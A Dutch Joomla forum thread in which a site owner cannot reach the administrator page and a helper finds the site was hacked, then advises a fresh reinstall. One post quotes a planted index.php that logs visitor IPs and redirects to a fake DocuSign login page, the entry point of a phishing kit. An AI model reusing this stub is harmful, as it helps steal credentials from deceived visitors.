Page 1 of 1

inloggen administrator

Posted: Wed Feb 27, 2019 6:47 pm
by Tonloh
Een tijd lang heb ik mij niet meer bezig gehouden met joomla. Ik wil toch de draad weer oppakken, maar komt niet bij mijn administrator scherm. http://www.geesteren.info/administrator

Het onderstaande wordt weergegeven op het scherm.
HTTP 500-fout
Dat is vreemd... deze pagina kan niet worden weergegeven door de website
Mogelijk vindt er onderhoud aan de site plaats of is er sprake van een programmeerfout.
Probeer dit
Ga terug naar de laatste pagina
Probeer contact op te nemen met de eigenaar van de website
Wie kan mij op weg helpen?

Re: inloggen administrator

Posted: Wed Feb 27, 2019 8:56 pm
by Rondeb
Hallo Tonloh,

je website werkt in frontend ook niet 403 foutmelding.

En het blijkt dat je site op 8 november al gehackt was/is! En zelfs eerdere als ik het zo bekijk.
https://web.archive.org/web/20181104175 ... eren.info/

De joomla versie die je gebruikt is 3.6.5 dat is een redelijk oude versie want die kwam uit december 2016!

En heb je nog een back-up van eind 2017 of begin 2018.

Vriendelijke groeten,

Ron

Re: inloggen administrator

Posted: Mon Mar 04, 2019 6:42 pm
by Tonloh
Dag Ron,
Ik heb geen backup meer. Ik wil graag weten, of ik, of hoe kan ik weer bij mijn inlogscherm http://www.geesteren.info/administrator komen.

Kan dat niet, dan begin ik eventueel helemaal opnieuw, maar als er een mogelijkheid is om de "fout" te herstellen, dan zou dat natuurlijk mooi zijn.

ik zie al mijn joomla bestanden gewoon staan wanneer ik inlog bij mijn hosting.

Re: inloggen administrator

Posted: Mon Mar 04, 2019 9:17 pm
by Rondeb
Hoi Ton,

download via FTP de configuration.php naar je pc en open deze met kladblok of notepad++
Zoek onderstaande regel op

Code: Select all

public $error_reporting = 'none';
Veranderen deze in

Code: Select all

public $error_reporting = '6135';
Opslaan dit geheel en weer uploaden naar je pc.

Kijk dan in de backend of je i.p.v. van een witte pagina een foutmelding te zien en deel deze hier even.

Succes ermee.

groeten Ron ;)

Re: inloggen administrator

Posted: Tue Mar 05, 2019 6:50 pm
by Tonloh
Ik zie in configuration.php onderstaand

<?php
/**
* @package Joomla.Site
* @subpackage com_config
*
* @copyright Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/

defined('_JEXEC') or die;

// Load classes
JLoader::registerPrefix('Config', JPATH_COMPONENT);

// Application
$app = JFactory::getApplication();

// Tell the browser not to cache this page.
$app->setHeader('Expires', 'Mon, 26 Jul 1997 05:00:00 GMT', true);

$controllerHelper = new ConfigControllerHelper;
$controller = $controllerHelper->parseController($app);

$controller->prefix = 'Config';

// Perform the Request task
$controller->execute();

Re: inloggen administrator

Posted: Tue Mar 05, 2019 8:59 pm
by Rondeb
Hallo Ton,

de regels die je hier boven vermeld staan normaal niet in configuration.php

Dus of je het verkeerde bestand genomen of het bestand is aangepast door iemand of wat.

Wanneer je er niet uit komt wil ik ook wel even een kijkje nemen in je site.

Groeten Ron

Re: inloggen administrator

Posted: Thu Mar 07, 2019 6:25 pm
by Tonloh
Dag Ron,

Het staat er toch echt in. Ik wil het graag zelf met een beetje hulp oplossen. Dank daarvoor. Het bestand configuration.php zie ik nergens. Ben alle mappen in de filemanager doorgelopen maar zie het niet. Waar zou die in moeten staan? Wel zie ik als eerder aangegeven op 5 mrt het bestand web.configuration, met de aangegeven tekst.

Re: inloggen administrator

Posted: Thu Mar 07, 2019 6:44 pm
by Tonloh
index php

<?php

$login = $_GET['login'];
$ip = getenv("REMOTE_ADDR");
$file = fopen("ip.txt","a");
fwrite($file,$ip." - ".gmdate ("Y-n-d")." @ ".gmdate ("H:i:s")."\n");
header("Location: docusign/index.php?login=$login");
?>

<html>
<!------
<script>
alert('DocuSign Sharing Business Documents, Login with your Email Provider:');
</script> ----->
</html>

Re: inloggen administrator

Posted: Thu Mar 07, 2019 9:00 pm
by Rondeb
Hallo Ton,

oplossen met een beetje hulp zou kunnen maar ik denk dat het meer als een beetje wordt ;)

Maar het kan wezen dat je hosting je site offline heeft gehaald om dat hij gehackt is, en dat ze verdachte/gehackte bestanden hebben verwijderd en dat daar door je site geheel offline is.

Dus vraag hun ook of zei meer weten.

De code komt mij niet bekend voor en ik geloof echt dat hij erin staat maar daarbij zegt ik dan ook meteen dat ik de code niet vertrouw. De code verwijst naar een login van Docusign is dat bij je bekend? Werken jullie daarmee misschien?
docusign.jpg
Je draait op Windows server zie ik nu i.p.v. htaccess file moet jij webconfig.php is die er?

En configuration.php is er niet zeg je maar deze heb je nodig nog want hier staan je database gegevens, de regels naar pad en tmp pad enz enz

Wanneer het bestand niet aanwezig is kan dat veroorzaakt zijn door de hacker, of je hosting of is er nog iemand anders die toegang heeft tot de site? En zoals ik in begin van dit bericht al meld vraag je hosting ook even of ze dingen hebben verwijderd.

Zo ziet een configuration.php eruit dit is een voorbeeld!

Code: Select all

<?php
class JConfig {
	public $MetaAuthor = '1';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaRights = '';
	public $MetaTitle = '1';
	public $MetaVersion = '0';
	public $access = '1';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $caching = '0';
	public $captcha = '0';
	public $cookie_domain = '';
	public $cookie_path = '';
	public $db = 'jouw-database-naam';
	public $dbprefix = 'prefix';
	public $dbtype = 'mysqli';
	public $debug = '0';
	public $debug_lang = '0';
	public $display_offline_message = '1';
	public $editor = 'jce';
	public $error_reporting = 'default';
	public $feed_email = 'none';
	public $feed_limit = '10';
	public $force_ssl = '0';
	public $fromname = '';
	public $ftp_enable = '0';
	public $ftp_host = '';
	public $ftp_pass = '';
	public $ftp_port = '21';
	public $ftp_root = '';
	public $ftp_user = '';
	public $gzip = '1';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $host = 'localhost';
	public $lifetime = '15';
	public $list_limit = '20';
	public $live_site = '';
	public $log_path = '......site......../logs';
	public $mailer = 'mail';
	public $mailfrom = 'mail';
	public $memcache_compress = '0';
	public $memcache_persist = '1';
	public $memcache_server_host = 'localhost';
	public $memcache_server_port = '11211';
	public $offline = '0';
	public $offline_image = '';
	public $offline_message = 'Deze website is tijdelijk niet beschikbaar i.v.m. werkzaamheden.<br /> Probeert u het later nog eens.';
	public $offset = 'UTC';
	public $offset_user = 'UTC';
	public $password = 'databasewachtwoord';
	public $robots = '';
	public $secret = 'rfggfdgfgrgtt';
	public $sef = '1';
	public $sef_rewrite = '1';
	public $sef_suffix = '0';
	public $sendmail = '/usr/sbin/sendmail';
	public $session_handler = 'database';
	public $sitename = 'Websitenaam';
	public $sitename_pagetitles = '2';
	public $smtpauth = '0';
	public $smtphost = 'localhost';
	public $smtppass = '';
	public $smtpport = '25';
	public $smtpsecure = 'none';
	public $smtpuser = '';
	public $tmp_path = '......site......../tmp';
	public $unicodeslugs = '1';
	public $user = 'Database-gebruiker';
	public $mailonline = '1';
	public $cache_platformprefix = '0';
	public $memcached_persist = '1';
	public $memcached_compress = '0';
	public $memcached_server_host = 'localhost';
	public $memcached_server_port = '11211';
	public $redis_persist = '1';
	public $redis_server_host = 'localhost';
	public $redis_server_port = '6379';
	public $redis_server_auth = '';
	public $redis_server_db = '0';
	public $proxy_enable = '0';
	public $proxy_host = '';
	public $proxy_port = '';
	public $proxy_user = '';
	public $proxy_pass = '';
	public $massmailoff = '0';
	public $session_memcache_server_host = 'localhost';
	public $session_memcache_server_port = '11211';
	public $session_memcached_server_host = 'localhost';
	public $session_memcached_server_port = '11211';
	public $frontediting = '1';
	public $asset_id = '1';
	public $debug_lang_const = '1';
	public $replyto = '';
	public $replytoname = '';
	public $session_redis_persist = '1';
	public $session_redis_server_host = 'localhost';
	public $session_redis_server_port = '6379';
	public $session_redis_server_auth = '';
	public $session_redis_server_db = '0';
	public $shared_session = '0';
}
Een heel verhaal en zoals je ziet is het niet een beetje ;)

Succes ermee en ik zie je reactie wel verschijnen.

groetjes Ron :)

Re: inloggen administrator

Posted: Sun Mar 10, 2019 8:39 am
by Tonloh
( Ik zit er over na te denken alles te verwijderen en helemaal opnieuw te beginnen. Kan ik alle mappen die ik je als printscreen gestuurd heb verwijderen?)

Zo ziet mijn webconfiguration eruit.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<directoryBrowse enabled="false" />
<defaultDocument>
<files>
<clear />
<add value="index.php" />
<add value="Default.htm" />
<add value="Default.asp" />
<add value="index.htm" />
<add value="index.html" />
<add value="iisstart.htm" />
<add value="default.aspx" />
</files>
</defaultDocument>
<httpErrors errorMode="DetailedLocalOnly" existingResponse="Auto" />
</system.webServer>
</configuration>

Re: inloggen administrator

Posted: Sun Mar 10, 2019 11:11 am
by Rondeb
Hoi Ton,

je hebt de root van je site daar staan alle mappen en bestanden in die je in de printscreens liet zien.

Al deze mappen en bestanden kan je verwijderen en je moet met een nieuwe database beginnen.

Hier handleiding hoe joomla installeren http://www.joomlain24dagen.nl/

Wel handmatig joomla installeren en niet via je hostingpanel want dat kan fouten opleveren in de toekomst.

Hou er wel rekening mee dat alles verloren gaat dus je begint echt op nul!

Succes ermee.

Groeten Ron